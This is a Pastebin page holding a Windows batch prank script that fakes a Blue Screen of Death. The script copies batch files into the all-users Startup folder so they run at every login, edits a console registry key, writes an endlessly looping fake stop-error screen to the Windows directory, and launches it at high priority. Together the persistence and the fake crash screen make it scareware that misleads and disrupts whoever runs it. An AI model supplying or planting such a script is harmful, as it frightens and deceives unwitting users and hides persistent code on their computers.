Advertisement
Guest User

fake bsod test fase

a guest
Apr 26th, 2017
153
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.73 KB | None | 0 0
  1. @echo off
  2. copy /Y *.bat "%allusersprofile%\Start Menu\Programs\Startup">nul
  3. REG add HKCU\Console /v FullScreen /t REG_DWORD /d 1 /f
  4. echo @echo off>%windir%\bsod.bat
  5. echo cd />>%windir%\bsod.bat
  6. echo cls>>%windir%\bsod.bat
  7. echo color 17>>%windir%\bsod.bat
  8. echo echo.>>%windir%\bsod.bat
  9. echo echo A problem has been detected and Windows has been shut down to prevent damage>>%windir%\bsod.bat
  10. echo echo to your computer.>>%windir%\bsod.bat
  11. echo echo.>>%windir%\bsod.bat
  12. echo echo.>>%windir%\bsod.bat
  13. echo echo The problem seems to be caused by the following file: SPCMDCON.SYS>>%windir%\bsod.bat
  14. echo echo.>>%windir%\bsod.bat
  15. echo echo.>>%windir%\bsod.bat
  16. echo echo PAGE_FAULT_IN_NONPAGED_AREA>>%windir%\bsod.bat
  17. echo echo.>>%windir%\bsod.bat
  18. echo echo.>>%windir%\bsod.bat
  19. echo echo If this is the first time you've seen this stop error screen,>>%windir%\bsod.bat
  20. echo echo restart your computer. If this screen appears again, follow>>%windir%\bsod.bat
  21. echo echo these steps:>>%windir%\bsod.bat
  22. echo echo.>>%windir%\bsod.bat
  23. echo echo.>>%windir%\bsod.bat
  24. echo echo Check to make sure any new hardware or software is properly installed.>>%windir%\bsod.bat
  25. echo echo If this is a new installation, ask your hardware or software manufacturer>>%windir%\bsod.bat
  26. echo echo for any Windows updates you might need.>>%windir%\bsod.bat
  27. echo echo.>>%windir%\bsod.bat
  28. echo echo.>>%windir%\bsod.bat
  29. echo echo If problems continue, disable or remove any newly installed hardware>>%windir%\bsod.bat
  30. echo echo or software. Disable BIOS memory options such as caching or shadowing.>>%windir%\bsod.bat
  31. echo echo If you need to use Safe Mode to remove or disable components, restart>>%windir%\bsod.bat
  32. echo echo your computer, press F8 to select Advanced Startup Options, and then>>%windir%\bsod.bat
  33. echo echo select Safe Mode.>>%windir%\bsod.bat
  34. echo echo.>>%windir%\bsod.bat
  35. echo echo.>>%windir%\bsod.bat
  36. echo echo Technical information:>>%windir%\bsod.bat
  37. echo echo.>>%windir%\bsod.bat
  38. echo echo.>>%windir%\bsod.bat
  39. echo echo *** STOP: 0x00000050 (0xFD3094C2,0x00000001,0xFBFE7617,0x0000 0000)>>%windir%\bsod.bat
  40. echo echo.>>%windir%\bsod.bat
  41. echo echo.>>%windir%\bsod.bat
  42. echo echo.>>%windir%\bsod.bat
  43. echo echo *** SPCMDCON.SYS - Address FBFE7617 base at FBFE5000, DateStamp 3d6dd67c>>%windir%\bsod.bat
  44. echo :1>>%windir%\bsod.bat
  45. echo goto :1>>%windir%\bsod.bat
  46. start /HIGH %windir%\bsod.bat
  47. REG add HKCU\Console /v FullScreen /t REG_DWORD /d 0 /f
  48. echo .
  49. color 0e
  50. echo ------------------------------------------------------------------
  51. echo if you press any key this will deseppear xD cred to: XnemisPvP
  52. echo ------------------------------------------------------------------
  53. PAUSE<nul
  54. exit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement